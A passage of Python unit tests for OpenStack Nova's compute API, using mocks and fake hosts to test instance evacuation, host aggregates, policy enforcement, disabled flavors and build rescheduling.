disk_over_commit=True,
host_name='fake_dest_host')
instance.refresh()
self.assertEqual(instance['task_state'], task_states.MIGRATING)
def test_evacuate(self):
instance = jsonutils.to_primitive(self._create_fake_instance(
services=True))
instance_uuid = instance['uuid']
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], None)
def fake_service_is_up(*args, **kwargs):
return False
def fake_rebuild_instance(*args, **kwargs):
db.instance_update(self.context, instance_uuid,
{'host': kwargs['host']})
self.stubs.Set(self.compute_api.servicegroup_api, 'service_is_up',
fake_service_is_up)
self.stubs.Set(self.compute_api.compute_rpcapi, 'rebuild_instance',
fake_rebuild_instance)
self.compute_api.evacuate(self.context.elevated(),
instance,
host='fake_dest_host',
on_shared_storage=True,
admin_password=None)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], task_states.REBUILDING)
self.assertEqual(instance['host'], 'fake_dest_host')
db.instance_destroy(self.context, instance['uuid'])
def test_fail_evacuate_from_non_existing_host(self):
inst = {}
inst['vm_state'] = vm_states.ACTIVE
inst['launched_at'] = timeutils.utcnow()
inst['image_ref'] = FAKE_IMAGE_REF
inst['reservation_id'] = 'r-fakeres'
inst['user_id'] = self.user_id
inst['project_id'] = self.project_id
inst['host'] = 'fake_host'
inst['node'] = NODENAME
type_id = flavors.get_flavor_by_name('m1.tiny')['id']
inst['instance_type_id'] = type_id
inst['ami_launch_index'] = 0
inst['memory_mb'] = 0
inst['vcpus'] = 0
inst['root_gb'] = 0
inst['ephemeral_gb'] = 0
inst['architecture'] = 'x86_64'
inst['os_type'] = 'Linux'
instance = jsonutils.to_primitive(db.instance_create(self.context,
inst))
instance_uuid = instance['uuid']
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], None)
self.assertRaises(exception.ComputeHostNotFound,
self.compute_api.evacuate, self.context.elevated(), instance,
host='fake_dest_host', on_shared_storage=True,
admin_password=None)
db.instance_destroy(self.context, instance['uuid'])
def test_fail_evacuate_from_running_host(self):
instance = jsonutils.to_primitive(self._create_fake_instance(
services=True))
instance_uuid = instance['uuid']
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], None)
def fake_service_is_up(*args, **kwargs):
return True
self.stubs.Set(self.compute_api.servicegroup_api, 'service_is_up',
fake_service_is_up)
self.assertRaises(exception.ComputeServiceInUse,
self.compute_api.evacuate, self.context.elevated(), instance,
host='fake_dest_host', on_shared_storage=True,
admin_password=None)
db.instance_destroy(self.context, instance['uuid'])
def test_fail_evacuate_instance_in_wrong_state(self):
instances = [
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.BUILDING})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.PAUSED})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.SUSPENDED})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.RESCUED})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.RESIZED})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.SOFT_DELETED})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.DELETED})),
jsonutils.to_primitive(self._create_fake_instance(
{'vm_state': vm_states.ERROR}))
]
for instance in instances:
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.evacuate, self.context, instance,
host='fake_dest_host', on_shared_storage=True,
admin_password=None)
db.instance_destroy(self.context, instance['uuid'])
def test_get_migrations(self):
migration = test_migration.fake_db_migration(uuid="1234")
filters = {'host': 'host1'}
self.mox.StubOutWithMock(db, "migration_get_all_by_filters")
db.migration_get_all_by_filters(self.context,
filters).AndReturn([migration])
self.mox.ReplayAll()
migrations = self.compute_api.get_migrations(self.context,
filters)
self.assertEqual(1, len(migrations))
self.assertEqual(migrations[0].id, migration['id'])
def _setup_get_instance_bdm_mox(self):
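# Stub the db layer so block_device_mapping_get_all_by_instance returns a
# sentinel object; callers compare against it to verify pass-through.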
new_bdm = object()
self.mox.StubOutWithMock(self.compute_api.db,
'block_device_mapping_get_all_by_instance')
self.compute_api.db.\
block_device_mapping_get_all_by_instance(
mox.IgnoreArg(), mox.IgnoreArg()).AndReturn(new_bdm)
return new_bdm
def test_get_instance_bdms_legacy(self):
expected = self._setup_get_instance_bdm_mox()
self.mox.ReplayAll()
instance = {'uuid': 'fake-instance'}
self.assertEqual(expected,
self.compute_api.get_instance_bdms({},
instance, legacy=False))
def test_get_instance_bdms_default(self):
new_bdm = self._setup_get_instance_bdm_mox()
expected = legacy_bdm = object()
self.mox.StubOutWithMock(block_device, 'legacy_mapping')
block_device.legacy_mapping(new_bdm).AndReturn(legacy_bdm)
self.mox.ReplayAll()
instance = {'uuid': 'fake-instance'}
self.assertEqual(expected,
self.compute_api.get_instance_bdms({}, instance))
def fake_rpc_method(context, topic, msg, do_cast=True):
pass
def _create_service_entries(context, values={'avail_zone1': ['fake_host1',
'fake_host2'],
'avail_zone2': ['fake_host3'], }):
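# Create a nova-compute service record for every host in each availability
# zone and hand back the zone -> hosts mapping for the caller to reuse.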
for avail_zone, hosts in values.iteritems():
for host in hosts:
db.service_create(context,
{'host': host,
'binary': 'nova-compute',
'topic': 'compute',
'report_count': 0})
return values
class ComputeAPIAggrTestCase(BaseTestCase):
"""This is for unit coverage of aggregate-related methods
defined in nova.compute.api.
"""
def setUp(self):
super(ComputeAPIAggrTestCase, self).setUp()
self.api = compute_api.AggregateAPI()
self.context = context.get_admin_context()
self.stubs.Set(rpc, 'call', fake_rpc_method)
self.stubs.Set(rpc, 'cast', fake_rpc_method)
def test_aggregate_no_zone(self):
# Ensure we can create an aggregate without an availability zone
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
None)
self.api.delete_aggregate(self.context, aggr['id'])
db.aggregate_get(self.context.elevated(read_deleted='yes'),
aggr['id'])
self.assertRaises(exception.AggregateNotFound,
self.api.delete_aggregate, self.context, aggr['id'])
def test_update_aggregate(self):
# Ensure an aggregate's properties (such as its name) can be updated.
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
'fake_zone')
fake_notifier.NOTIFICATIONS = []
aggr = self.api.update_aggregate(self.context, aggr['id'],
{'name': 'new_fake_aggregate'})
self.assertEqual(availability_zones._get_cache().get('cache'), None)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'aggregate.updateprop.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'aggregate.updateprop.end')
def test_update_aggregate_metadata(self):
# Ensure metadata can be updated.
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
'fake_zone')
metadata = {'foo_key1': 'foo_value1',
'foo_key2': 'foo_value2', }
fake_notifier.NOTIFICATIONS = []
aggr = self.api.update_aggregate_metadata(self.context, aggr['id'],
metadata)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'aggregate.updatemetadata.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'aggregate.updatemetadata.end')
metadata['foo_key1'] = None
expected = self.api.update_aggregate_metadata(self.context,
aggr['id'], metadata)
self.assertThat(expected['metadata'],
matchers.DictMatches({'availability_zone': 'fake_zone',
'foo_key2': 'foo_value2'}))
def test_delete_aggregate(self):
# Ensure we can delete an aggregate.
fake_notifier.NOTIFICATIONS = []
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
'fake_zone')
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'aggregate.create.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'aggregate.create.end')
fake_notifier.NOTIFICATIONS = []
self.api.delete_aggregate(self.context, aggr['id'])
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'aggregate.delete.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'aggregate.delete.end')
db.aggregate_get(self.context.elevated(read_deleted='yes'),
aggr['id'])
self.assertRaises(exception.AggregateNotFound,
self.api.delete_aggregate, self.context, aggr['id'])
def test_delete_non_empty_aggregate(self):
# Ensure InvalidAggregateAction is raised when deleting a non-empty aggregate.
_create_service_entries(self.context,
{'fake_availability_zone': ['fake_host']})
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
'fake_availability_zone')
self.api.add_host_to_aggregate(self.context, aggr['id'], 'fake_host')
self.assertRaises(exception.InvalidAggregateAction,
self.api.delete_aggregate, self.context, aggr['id'])
def test_add_host_to_aggregate(self):
# Ensure we can add a host to an aggregate.
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
fake_host = values[fake_zone][0]
aggr = self.api.create_aggregate(self.context,
'fake_aggregate', fake_zone)
def fake_add_aggregate_host(*args, **kwargs):
hosts = kwargs["aggregate"]["hosts"]
self.assertTrue(fake_host in hosts)
self.stubs.Set(self.api.compute_rpcapi, 'add_aggregate_host',
fake_add_aggregate_host)
fake_notifier.NOTIFICATIONS = []
aggr = self.api.add_host_to_aggregate(self.context,
aggr['id'], fake_host)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'aggregate.addhost.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'aggregate.addhost.end')
self.assertEqual(len(aggr['hosts']), 1)
def test_add_host_to_aggr_with_no_az(self):
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
fake_host = values[fake_zone][0]
aggr = self.api.create_aggregate(self.context,
'fake_aggregate', fake_zone)
aggr = self.api.add_host_to_aggregate(self.context, aggr['id'],
fake_host)
aggr_no_az = self.api.create_aggregate(self.context, 'fake_aggregate2',
None)
aggr_no_az = self.api.add_host_to_aggregate(self.context,
aggr_no_az['id'],
fake_host)
self.assertIn(fake_host, aggr['hosts'])
self.assertIn(fake_host, aggr_no_az['hosts'])
def test_add_host_no_az_metadata(self):
# NOTE(mtreinish) based on how create works, this is not how the
# metadata is supposed to end up in the database but it has
# been seen. See lp bug #1209007. This test just confirms that
# the host is still added to the aggregate if there is no
# availability zone metadata.
def fake_aggregate_metadata_get_by_metadata_key(*args, **kwargs):
return {'meta_key': 'fake_value'}
self.stubs.Set(self.compute.db,
'aggregate_metadata_get_by_metadata_key',
fake_aggregate_metadata_get_by_metadata_key)
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
fake_host = values[fake_zone][0]
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
fake_zone)
aggr = self.api.add_host_to_aggregate(self.context, aggr['id'],
fake_host)
self.assertIn(fake_host, aggr['hosts'])
def test_add_host_to_multi_az(self):
# Ensure we can't add a host to a different availability zone
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
fake_host = values[fake_zone][0]
aggr = self.api.create_aggregate(self.context,
'fake_aggregate', fake_zone)
aggr = self.api.add_host_to_aggregate(self.context,
aggr['id'], fake_host)
self.assertEqual(len(aggr['hosts']), 1)
fake_zone2 = "another_zone"
aggr2 = self.api.create_aggregate(self.context,
'fake_aggregate2', fake_zone2)
self.assertRaises(exception.InvalidAggregateAction,
self.api.add_host_to_aggregate,
self.context, aggr2['id'], fake_host)
def test_add_host_to_aggregate_multiple(self):
# Ensure we can add multiple hosts to an aggregate.
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
aggr = self.api.create_aggregate(self.context,
'fake_aggregate', fake_zone)
for host in values[fake_zone]:
aggr = self.api.add_host_to_aggregate(self.context,
aggr['id'], host)
self.assertEqual(len(aggr['hosts']), len(values[fake_zone]))
def test_add_host_to_aggregate_raise_not_found(self):
# Ensure ComputeHostNotFound is raised when adding invalid host.
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
'fake_zone')
fake_notifier.NOTIFICATIONS = []
self.assertRaises(exception.ComputeHostNotFound,
self.api.add_host_to_aggregate,
self.context, aggr['id'], 'invalid_host')
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
self.assertEqual(fake_notifier.NOTIFICATIONS[1].publisher_id,
'compute.fake-mini')
def test_remove_host_from_aggregate_active(self):
# Ensure we can remove a host from an aggregate.
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
aggr = self.api.create_aggregate(self.context,
'fake_aggregate', fake_zone)
for host in values[fake_zone]:
aggr = self.api.add_host_to_aggregate(self.context,
aggr['id'], host)
host_to_remove = values[fake_zone][0]
def fake_remove_aggregate_host(*args, **kwargs):
hosts = kwargs["aggregate"]["hosts"]
self.assertNotIn(host_to_remove, hosts)
self.stubs.Set(self.api.compute_rpcapi, 'remove_aggregate_host',
fake_remove_aggregate_host)
fake_notifier.NOTIFICATIONS = []
expected = self.api.remove_host_from_aggregate(self.context,
aggr['id'],
host_to_remove)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'aggregate.removehost.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'aggregate.removehost.end')
self.assertEqual(len(aggr['hosts']) - 1, len(expected['hosts']))
def test_remove_host_from_aggregate_raise_not_found(self):
# Ensure ComputeHostNotFound is raised when removing invalid host.
_create_service_entries(self.context, {'fake_zone': ['fake_host']})
aggr = self.api.create_aggregate(self.context, 'fake_aggregate',
'fake_zone')
self.assertRaises(exception.ComputeHostNotFound,
self.api.remove_host_from_aggregate,
self.context, aggr['id'], 'invalid_host')
def test_aggregate_list(self):
aggregate = self.api.create_aggregate(self.context,
'fake_aggregate',
'fake_zone')
metadata = {'foo_key1': 'foo_value1',
'foo_key2': 'foo_value2'}
meta_aggregate = self.api.create_aggregate(self.context,
'fake_aggregate2',
'fake_zone2')
self.api.update_aggregate_metadata(self.context, meta_aggregate['id'],
metadata)
aggregate_list = self.api.get_aggregate_list(self.context)
self.assertIn(aggregate['id'],
map(lambda x: x['id'], aggregate_list))
self.assertIn(meta_aggregate['id'],
map(lambda x: x['id'], aggregate_list))
self.assertIn('fake_aggregate',
map(lambda x: x['name'], aggregate_list))
self.assertIn('fake_aggregate2',
map(lambda x: x['name'], aggregate_list))
self.assertIn('fake_zone',
map(lambda x: x['availability_zone'], aggregate_list))
self.assertIn('fake_zone2',
map(lambda x: x['availability_zone'], aggregate_list))
test_meta_aggregate = aggregate_list[1]
self.assertIn('foo_key1', test_meta_aggregate.get('metadata'))
self.assertIn('foo_key2', test_meta_aggregate.get('metadata'))
self.assertEquals('foo_value1',
test_meta_aggregate.get('metadata')['foo_key1'])
self.assertEquals('foo_value2',
test_meta_aggregate.get('metadata')['foo_key2'])
def test_aggregate_list_with_hosts(self):
values = _create_service_entries(self.context)
fake_zone = values.keys()[0]
host_aggregate = self.api.create_aggregate(self.context,
'fake_aggregate',
fake_zone)
self.api.add_host_to_aggregate(self.context, host_aggregate['id'],
values[fake_zone][0])
aggregate_list = self.api.get_aggregate_list(self.context)
aggregate = aggregate_list[0]
self.assertIn(values[fake_zone][0], aggregate.get('hosts'))
class ComputeAggrTestCase(BaseTestCase):
"""This is for unit coverage of aggregate-related methods
defined in nova.compute.manager.
"""
def setUp(self):
super(ComputeAggrTestCase, self).setUp()
self.context = context.get_admin_context()
values = {'name': 'test_aggr'}
az = {'availability_zone': 'test_zone'}
self.aggr = db.aggregate_create(self.context, values, metadata=az)
def test_add_aggregate_host(self):
def fake_driver_add_to_aggregate(context, aggregate, host, **_ignore):
fake_driver_add_to_aggregate.called = True
return {"foo": "bar"}
self.stubs.Set(self.compute.driver, "add_to_aggregate",
fake_driver_add_to_aggregate)
self.compute.add_aggregate_host(self.context, "host",
aggregate=jsonutils.to_primitive(self.aggr))
self.assertTrue(fake_driver_add_to_aggregate.called)
def test_remove_aggregate_host(self):
def fake_driver_remove_from_aggregate(context, aggregate, host,
**_ignore):
fake_driver_remove_from_aggregate.called = True
self.assertEqual("host", host, "host")
return {"foo": "bar"}
self.stubs.Set(self.compute.driver, "remove_from_aggregate",
fake_driver_remove_from_aggregate)
self.compute.remove_aggregate_host(self.context,
aggregate=jsonutils.to_primitive(self.aggr), host="host")
self.assertTrue(fake_driver_remove_from_aggregate.called)
def test_add_aggregate_host_passes_slave_info_to_driver(self):
def driver_add_to_aggregate(context, aggregate, host, **kwargs):
self.assertEquals(self.context, context)
self.assertEquals(aggregate['id'], self.aggr['id'])
self.assertEquals(host, "the_host")
self.assertEquals("SLAVE_INFO", kwargs.get("slave_info"))
self.stubs.Set(self.compute.driver, "add_to_aggregate",
driver_add_to_aggregate)
self.compute.add_aggregate_host(self.context, "the_host",
slave_info="SLAVE_INFO",
aggregate=jsonutils.to_primitive(self.aggr))
def test_remove_from_aggregate_passes_slave_info_to_driver(self):
def driver_remove_from_aggregate(context, aggregate, host, **kwargs):
self.assertEquals(self.context, context)
self.assertEquals(aggregate['id'], self.aggr['id'])
self.assertEquals(host, "the_host")
self.assertEquals("SLAVE_INFO", kwargs.get("slave_info"))
self.stubs.Set(self.compute.driver, "remove_from_aggregate",
driver_remove_from_aggregate)
self.compute.remove_aggregate_host(self.context,
aggregate=jsonutils.to_primitive(self.aggr), host="the_host",
slave_info="SLAVE_INFO")
class ComputePolicyTestCase(BaseTestCase):
def setUp(self):
super(ComputePolicyTestCase, self).setUp()
self.compute_api = compute.API()
def test_actions_are_prefixed(self):
self.mox.StubOutWithMock(policy, 'enforce')
nova.policy.enforce(self.context, 'compute:reboot', {})
self.mox.ReplayAll()
compute_api.check_policy(self.context, 'reboot', {})
def test_wrapped_method(self):
instance = self._create_fake_instance(params={'host': None,
'cell_name': 'foo'})
# force delete to fail
rules = {"compute:delete": [["false:false"]]}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.delete, self.context, instance)
# reset rules to allow deletion
rules = {"compute:delete": []}
self.policy.set_rules(rules)
self.compute_api.delete(self.context, self._objectify(instance))
def test_create_fail(self):
rules = {"compute:create": [["false:false"]]}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.create, self.context, '1', '1')
def test_create_attach_volume_fail(self):
rules = {
"compute:create": [],
"compute:create:attach_network": [["false:false"]],
"compute:create:attach_volume": [],
}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.create, self.context, '1', '1',
requested_networks='blah',
block_device_mapping='blah')
def test_create_attach_network_fail(self):
rules = {
"compute:create": [],
"compute:create:attach_network": [],
"compute:create:attach_volume": [["false:false"]],
}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.create, self.context, '1', '1',
requested_networks='blah',
block_device_mapping='blah')
def test_get_fail(self):
instance = self._create_fake_instance()
rules = {
"compute:get": [["false:false"]],
}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.get, self.context, instance['uuid'])
def test_get_all_fail(self):
rules = {
"compute:get_all": [["false:false"]],
}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.get_all, self.context)
def test_get_instance_faults(self):
instance1 = self._create_fake_instance()
instance2 = self._create_fake_instance()
instances = [instance1, instance2]
rules = {
"compute:get_instance_faults": [["false:false"]],
}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.get_instance_faults,
context.get_admin_context(), instances)
def test_force_host_fail(self):
rules = {"compute:create": [],
"compute:create:forced_host": [["role:fake"]],
"network:validate_networks": []}
self.policy.set_rules(rules)
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.create, self.context, None, '1',
availability_zone='1:1')
def test_force_host_pass(self):
rules = {"compute:create": [],
"compute:create:forced_host": [],
"network:validate_networks": []}
self.policy.set_rules(rules)
self.compute_api.create(self.context, None, '1',
availability_zone='1:1')
class DisabledInstanceTypesTestCase(BaseTestCase):
"""
Some instance-types are marked 'disabled' which means that they will not
show up in customer-facing listings. We do, however, want those
instance-types to be available for emergency migrations and for rebuilding
of existing instances.
One legitimate use of the 'disabled' field would be when phasing out a
particular instance-type. We still want customers to be able to use an
instance of the old type, and we want Ops to be able to perform
migrations against it, but we *don't* want customers building new slices
with this phased-out instance-type.
"""
def setUp(self):
super(DisabledInstanceTypesTestCase, self).setUp()
self.compute_api = compute.API()
self.inst_type = flavors.get_default_flavor()
def test_can_build_instance_from_visible_instance_type(self):
self.inst_type['disabled'] = False
# Assert that exception.InstanceTypeNotFound is not raised
self.compute_api.create(self.context, self.inst_type,
image_href='some-fake-image')
def test_cannot_build_instance_from_disabled_instance_type(self):
self.inst_type['disabled'] = True
self.assertRaises(exception.InstanceTypeNotFound,
self.compute_api.create, self.context, self.inst_type, None)
def test_can_resize_to_visible_instance_type(self):
instance = self._create_fake_instance_obj()
orig_get_flavor_by_flavor_id =\
flavors.get_flavor_by_flavor_id
def fake_get_flavor_by_flavor_id(flavor_id, ctxt=None,
read_deleted="yes"):
instance_type = orig_get_flavor_by_flavor_id(flavor_id,
ctxt,
read_deleted)
instance_type['disabled'] = False
return instance_type
self.stubs.Set(flavors, 'get_flavor_by_flavor_id',
fake_get_flavor_by_flavor_id)
# FIXME(sirp): for legacy this raises FlavorNotFound instead of
# InstanceTypeNotFound; we should eventually make it raise
# InstanceTypeNotFound for consistency.
self._stub_migrate_server()
self.compute_api.resize(self.context, instance, '4')
def test_cannot_resize_to_disabled_instance_type(self):
instance = self._create_fake_instance_obj()
orig_get_flavor_by_flavor_id = \
flavors.get_flavor_by_flavor_id
def fake_get_flavor_by_flavor_id(flavor_id, ctxt=None,
read_deleted="yes"):
instance_type = orig_get_flavor_by_flavor_id(flavor_id,
ctxt,
read_deleted)
instance_type['disabled'] = True
return instance_type
self.stubs.Set(flavors, 'get_flavor_by_flavor_id',
fake_get_flavor_by_flavor_id)
# FIXME(sirp): for legacy this raises FlavorNotFound instead of
# InstanceTypeNotFound; we should eventually make it raise
# InstanceTypeNotFound for consistency.
self.assertRaises(exception.FlavorNotFound,
self.compute_api.resize, self.context, instance, '4')
class ComputeReschedulingTestCase(BaseTestCase):
"""Tests re-scheduling logic for new build requests."""
def setUp(self):
super(ComputeReschedulingTestCase, self).setUp()
self.expected_task_state = task_states.SCHEDULING
def fake_update(*args, **kwargs):
self.updated_task_state = kwargs.get('task_state')
self.stubs.Set(self.compute, '_instance_update', fake_update)
def _reschedule(self, request_spec=None, filter_properties=None,
exc_info=None):
if not filter_properties:
filter_properties = {}
instance_uuid = "12-34-56-78-90"
admin_password = None
injected_files = None
requested_networks = None
is_first_time = False
scheduler_method = self.compute.scheduler_rpcapi.run_instance
method_args = (request_spec, admin_password, injected_files,
requested_networks, is_first_time, filter_properties)
return self.compute._reschedule(self.context, request_spec,
filter_properties, instance_uuid, scheduler_method,
method_args, self.expected_task_state, exc_info=exc_info)
def test_reschedule_no_filter_properties(self):
# no filter_properties will disable re-scheduling.
self.assertFalse(self._reschedule())
def test_reschedule_no_retry_info(self):
# no retry info will also disable re-scheduling.
filter_properties = {}
self.assertFalse(self._reschedule(filter_properties=filter_properties))
def test_reschedule_no_request_spec(self):
# no request spec will also disable re-scheduling.
retry = dict(num_attempts=1)
filter_properties = dict(retry=retry)
self.assertFalse(self._reschedule(filter_properties=filter_properties))
def test_reschedule_success(self):
retry = dict(num_attempts=1)
filter_properties = dict(retry=retry)
request_spec = {'instance_uuids': ['foo', 'bar']}
try:
raise test.TestingException("just need an exception")
except test.TestingException:
exc_info = sys.exc_info()
exc_str = traceback.format_exception(*exc_info)
self.assertTrue(self._reschedule(filter_properties=filter_properties,
request_spec=request_spec, exc_info=exc_info))
self.assertEqual(1, len(request_spec['instance_uuids']))
self.assertEqual(self.updated_task_state, self.expected_task_state)
self.assertEqual(exc_str, filter_properties['retry']['exc'])
class ComputeReschedulingResizeTestCase(ComputeReschedulingTestCase):
"""Test re-scheduling logic for prep_resize requests."""
def setUp(self):
super(ComputeReschedulingResizeTestCase, self).setUp()
self.expected_task_state = task_states.RESIZE_PREP
def _reschedule(self, request_spec=None, filter_properties=None,
exc_info=None):
if not filter_properties:
filter_properties = {}
instance_uuid = "12-34-56-78-90"
instance = fake_instance.fake_db_instance(uuid=instance_uuid)
instance = self._objectify(instance)
instance_type = {}
image = None
reservations = None
scheduler_method = self.compute.scheduler_rpcapi.prep_resize
method_args = (instance, instance_type, image, request_spec,
filter_properties, reservations)
return self.compute._reschedule(self.context, request_spec,
filter_properties, instance_uuid, scheduler_method,
method_args, self.expected_task_state, exc_info=exc_info)
class InnerTestingException(Exception):
pass
class ComputeRescheduleOrErrorTestCase(BaseTestCase):
"""Test logic and exception handling around rescheduling or re-raising
original exceptions when builds fail.
"""
def setUp(self):
super(ComputeRescheduleOrErrorTestCase, self).setUp()
self.instance = self._create_fake_instance()
def test_reschedule_or_error_called(self):
"""Basic sanity check to make sure _reschedule_or_error is called
when a build fails.
"""
self.mox.StubOutWithMock(self.compute, '_spawn')
self.mox.StubOutWithMock(self.compute, '_reschedule_or_error')
self.compute._spawn(mox.IgnoreArg(), self.instance, mox.IgnoreArg(),
[], mox.IgnoreArg(), [], None, set_access_ip=False).AndRaise(
test.TestingException("BuildError"))
self.compute._reschedule_or_error(mox.IgnoreArg(), self.instance,
mox.IgnoreArg(), None, None, None,
False, None, {}, [], False).AndReturn(True)
self.mox.ReplayAll()
self.compute._run_instance(self.context, None, {}, None, None, None,
False, None, self.instance, False)
def test_shutdown_instance_fail(self):
"""Test shutdown instance failing before re-scheduling logic can even
run.
"""
instance_uuid = self.instance['uuid']
self.mox.StubOutWithMock(self.compute, '_shutdown_instance')
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
compute_utils.add_instance_fault_from_exc(self.context,
self.compute.conductor_api,
self.instance, exc_info[0], exc_info=exc_info)
self.compute._shutdown_instance(self.context, self.instance,
mox.IgnoreArg(),
mox.IgnoreArg()).AndRaise(InnerTestingException("Error"))
self.compute._log_original_error(exc_info, instance_uuid)
self.mox.ReplayAll()
# should raise the shutdown exception, not the original build
# error:
self.assertRaises(InnerTestingException,
self.compute._reschedule_or_error, self.context,
self.instance, exc_info, None, None, None, False, None, {})
def test_reschedule_fail(self):
# Test handling of exception from _reschedule.
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
instance_uuid = self.instance['uuid']
method_args = (None, None, None, None, False, {})
self.mox.StubOutWithMock(self.compute, '_shutdown_instance')
self.mox.StubOutWithMock(self.compute, '_cleanup_volumes')
self.mox.StubOutWithMock(self.compute, '_reschedule')
self.compute._shutdown_instance(self.context, self.instance,
mox.IgnoreArg(),
mox.IgnoreArg())
self.compute._cleanup_volumes(self.context, instance_uuid,
mox.IgnoreArg())
self.compute._reschedule(self.context, None, instance_uuid,
{}, self.compute.scheduler_rpcapi.run_instance,
method_args, task_states.SCHEDULING, exc_info).AndRaise(
InnerTestingException("Inner"))
self.mox.ReplayAll()
self.assertFalse(self.compute._reschedule_or_error(self.context,
self.instance, exc_info, None, None, None, False, None, {}))
def test_reschedule_false(self):
# Test not-rescheduling, but no nested exception.
instance_uuid = self.instance['uuid']
method_args = (None, None, None, None, False, {})
self.mox.StubOutWithMock(self.compute, '_shutdown_instance')
self.mox.StubOutWithMock(self.compute, '_cleanup_volumes')
self.mox.StubOutWithMock(self.compute, '_reschedule')
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
compute_utils.add_instance_fault_from_exc(self.context,
self.compute.conductor_api,
self.instance, exc_info[0], exc_info=exc_info)
self.compute._shutdown_instance(self.context, self.instance,
mox.IgnoreArg(),
mox.IgnoreArg())
self.compute._cleanup_volumes(self.context, instance_uuid,
mox.IgnoreArg())
self.compute._reschedule(self.context, None, {}, instance_uuid,
self.compute.scheduler_rpcapi.run_instance, method_args,
task_states.SCHEDULING, exc_info).AndReturn(False)
self.mox.ReplayAll()
# re-scheduling is False, so _reschedule_or_error returns False and the
# caller is left to re-raise the original build error:
self.assertFalse(self.compute._reschedule_or_error(self.context,
self.instance, exc_info, None, None, None, False, None, {}))
def test_reschedule_true(self):
# Test behavior when re-scheduling happens.
instance_uuid = self.instance['uuid']
method_args = (None, None, None, None, False, {})
self.mox.StubOutWithMock(self.compute, '_shutdown_instance')
self.mox.StubOutWithMock(self.compute, '_cleanup_volumes')
self.mox.StubOutWithMock(self.compute, '_reschedule')
try:
raise test.TestingException("Original")
except Exception:
exc_info = sys.exc_info()
compute_utils.add_instance_fault_from_exc(self.context,
self.compute.conductor_api,
self.instance, exc_info[0], exc_info=exc_info)
self.compute._shutdown_instance(self.context, self.instance,
mox.IgnoreArg(),
mox.IgnoreArg())
self.compute._cleanup_volumes(self.context, instance_uuid,
mox.IgnoreArg())
self.compute._reschedule(self.context, None, {}, instance_uuid,
self.compute.scheduler_rpcapi.run_instance,
method_args, task_states.SCHEDULING, exc_info).AndReturn(
True)
self.compute._log_original_error(exc_info, instance_uuid)
self.mox.ReplayAll()
# re-scheduling is True, original error is logged, but nothing
# is raised:
self.compute._reschedule_or_error(self.context, self.instance,
exc_info, None, None, None, False, None, {})
def test_no_reschedule_on_delete_during_spawn(self):
# instance should not be rescheduled if instance is deleted
# during the build
self.mox.StubOutWithMock(self.compute, '_spawn')
self.mox.StubOutWithMock(self.compute, '_reschedule_or_error')
exc = exception.UnexpectedTaskStateError(expected=task_states.SPAWNING,
actual=task_states.DELETING)
self.compute._spawn(mox.IgnoreArg(), self.instance, mox.IgnoreArg(),
